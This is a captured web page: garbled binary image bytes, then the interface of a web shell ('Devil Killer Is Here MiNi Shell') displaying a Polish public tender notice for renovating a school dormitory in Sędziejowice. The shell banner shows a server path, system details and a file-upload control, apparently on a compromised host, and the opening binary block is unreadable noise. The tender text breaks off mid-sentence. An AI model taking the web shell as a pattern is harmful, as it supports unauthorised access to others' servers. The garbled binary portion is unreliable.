JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240430/0030848001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i remont pomieszczeń w budynku internatu w Zespole Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000095615</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolonia 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziejowice-Kolonia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43 677 10 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zsckrsedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsrgrabski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i remont pomieszczeń w budynku internatu w Zespole Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1dddffa6-06da-11ef-bfd2-32fa350b5bfc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00308480</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00278117/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa i remont pomieszczeń w budynku internatu w Zespole Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1dddffa6-06da-11ef-bfd2-32fa350b5bfc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert, które należy złożyć elektronicznie, w sposób opisany w cz. XVI SWZ, odbywa się drogą elektroniczną<br/>za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za<br/>pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk<br/>„dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w<br/>sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/>W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane<br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia.<br/>Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej, za pośrednictwem platformy e-Zamówienia –<br/>https://ezamowienia.gov.pl/. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>postępowania lub numerem ogłoszenia z BZP.<br/>Na platformie e-Zamówienia https://ezamowienia.gov.pl/założona jest odrębna strona przeznaczona dla niniejszego postępowania i<br/>w jej ramach udostępnione są dokumenty postępowania, narzędzia do komunikacji z Zamawiającym oraz narzędzia służące<br/>złożeniu/wycofaniu oferty.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformie<br/>https://ezamowienia.gov.pl/ przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie<br/>może trafić do folderu SPAM.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl. oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>Zamawiający dopuszcza, w wyjątkowych przypadkach, komunikację z Wykonawcami za pomocą poczty elektronicznej, e-mail:<br/>przetargi@zsckrsedziejowice.pl<br/>Pełna informacja w zakresie komunikacji elektronicznej znajduje się w cz. XV SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z <br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych <br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 <br/>z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: <br/>- Administratorem danych osobowych Wykonawcy jest - Dyrektor Zespołu Szkół <br/>Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach,<br/>Sędziejowice - Kolonia 10, 98 - 160 Sędziejowice. Inspektorem danych osobowych jest <br/>Pan Michał Bartela. Telefon do szkoły - 43 677 10 04. Adres email: sekretariat@zs<br/>ckrsedziejowice .pl <br/>- Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w <br/>celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego <br/>oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny <br/>stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający <br/>na Zamawiającym – w oparciu o przepisy ustawy Prawo zamówień publicznych oraz <br/>aktów wykonawczych do Pzp.<br/>- Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp. <br/>- Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres <br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Obowiązek <br/>podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem <br/>ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o <br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z <br/>Pzp.<br/>- Państwa dane osobowe nie będą przetwarzane w sposób zautomatyzowany oraz <br/>nie będą podlegały profilowaniu, stosowanie do art. 22 RODO.<br/>- Do Państwa danych osobowych mogą mieć dostęp, wyłącznie na podstawie zawartych <br/>umów powierzenia przetwarzania, podmioty zewnętrzne realizujące usługi na rzecz <br/>zamawiającego, nadto podmioty korzystające z Biuletynu Informacji Publicznej, Biuletynu <br/>Zamówień Publicznych, systemu E-zamówienia, Bazy konkurencyjności oraz internetowej <br/>platformy zakupowej e-Katalogi, będącej w gestii Urzędu Zamówień Publicznych. <br/>- W związku z przetwarzaniem Państwa danych osobowych jesteście Państwo <br/>uprawnieni do: <br/>a)dostępu do swoich danych osobowych – na podstawie art. 15 RODO, <br/>b)sprostowania lub uzupełnienia swoich danych osobowych – na podstawie art. 16 RODO, <br/>przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować <br/>33<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą <br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać <br/>integralności protokołu oraz jego załączników. <br/>c) żądania od administratora ograniczenia przetwarzania danych osobowych z <br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do <br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w <br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej <br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii <br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych <br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia,<br/>d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają <br/>Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy <br/>RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">- Nie przysługuje Państwu: <br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO. <br/>Jednocześnie Zamawiający przypomina o ciążącym na Państwu obowiązku <br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane <br/>przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które <br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba <br/>że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCKR.01.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na <br/>przebudowie i remoncie pomieszczeń w budynku internatu w Zespole Szkół Centrum <br/>Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach. Parter <br/>budynku przewidziany na internat męski, piętro internat damski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45442180-2 - Powtórne malowanie</p> <p class="mb-0">45422100-2 - Stolarka drewniana</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">39150000-8 - Różne meble i wyposażenie</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający zastosuje następujące <br/>kryteria oceny ofert, przypisując im odpowiednią wagę punktową zakładając, że w zakresie <br/>każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium = 1 punkt. 1) W przypadku kryterium „Cena brutto&#34; oferta otrzyma zaokrągloną do dwóch miejsc po <br/>przecinku ilość punktów wynikającą z działania:<br/>CN<br/>C = ----------------------------------- x 60 pkt <br/> COB <br/>a) Maksymalna liczba punktów jaką może uzyskać oferta w kryterium oceny ofert jakim<br/>jest „Cena brutto” wynosi – 60 pkt. <br/>b) Zgodnie z art. 225 pkt 1 Pzp, w przypadku, gdy wybór oferty prowadziłby do powstania <br/>u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, <br/>do ceny najkorzystniejszej oferty lub oferty z najniższą ceną zostanie odpowiednio doliczony <br/>podatek VAT, który Zamawiający miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/> 3. Zasady oceny ofert wg kryterium „Długość okresu gwarancji” (D) :<br/>a) Wykonawca zobowiązany jest udzielić co najmniej 60 miesięcznej gwarancji na całość <br/>przedmiotu zamówienia. Zamawiający przyzna punkty, jeśli Wykonawca wydłuży okres <br/>gwarancji do 72 miesięcy lub 84 miesięcy. Wykonawca otrzyma 40 pkt – w przypadku wydłużenia okresu <br/>gwarancji do 84 miesięcy.<br/>Wykonawca otrzyma 20 pkt – w przypadku wydłużenia okresu <br/>gwarancji do 72 miesięcy<br/>Wykonawca otrzyma 0 pkt – w przypadku utrzymania minimalnego <br/>okresu gwarancji (tj. 60 miesięcy gwarancji na przedmiot dostawy). <br/>4. Końcowa ocena ofert<br/>a) Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze <br/>wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do <br/>drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest <br/>mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 <br/>wynik zostanie zaokrąglony w górę.<br/>b) Sposób wyznaczenia końcowej oceny oferty nastąpi wg wzoru: <br/>Ko = C + D <br/>c) Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach:<br/>(1 % = 1 pkt.)<br/>d) Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością <br/>do dwóch miejsc po przecinku, przy wykorzystaniu matematycznych zasad zaokrąglania; <br/>najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. <br/>e) Zamawiający udzieli zamówienia temu (tym) Wykonawcy (Wykonawcom), którego(ych) <br/>oferta zostanie uznana za najkorzystniejszą, tj. uzyska największą łączną ilość punktów ze <br/>wszystkich kryteriów.<br/>f) Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcejofert <br/>przedstawiają taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający:<br/>- spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze.<br/>- jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający<br/>wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>g) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej w pkt f) , <br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie <br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt, przy <br/>29<br/>czym, Wykonawcy składający oferty dodatkowe nie mogą zaoferować cen lub kosztów <br/>wyższych niż zaoferowane w uprzednio złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>na zasadach określonych w cz. VII SWZ, oraz spełniają warunki udziału w postępowaniu, <br/>określone na podstawie art. 112 Pzp dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów; <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie <br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną <br/>minimum 1.000.000,00 zł.<br/>- Jeżeli w trakcie realizacji umowy polisa straci ważność, Wykonawca jest zobowiązany<br/>do przedłożenia kserokopii nowej polisy poświadczonej za zgodność z oryginałem.<br/>13<br/>- Wartości podane w dokumentach w walutach innych niż wskazane przez<br/>Zamawiającego wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia <br/>dokumentu.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże (Załącznik Nr 3 do SWZ), że <br/>zrealizował należycie/zakończył, w okresie ostatnich 5 lat przed upływem <br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy <br/>w tym okresie, co najmniej 2 roboty budowlane <br/>(o wartości każdej z tych robót minimum 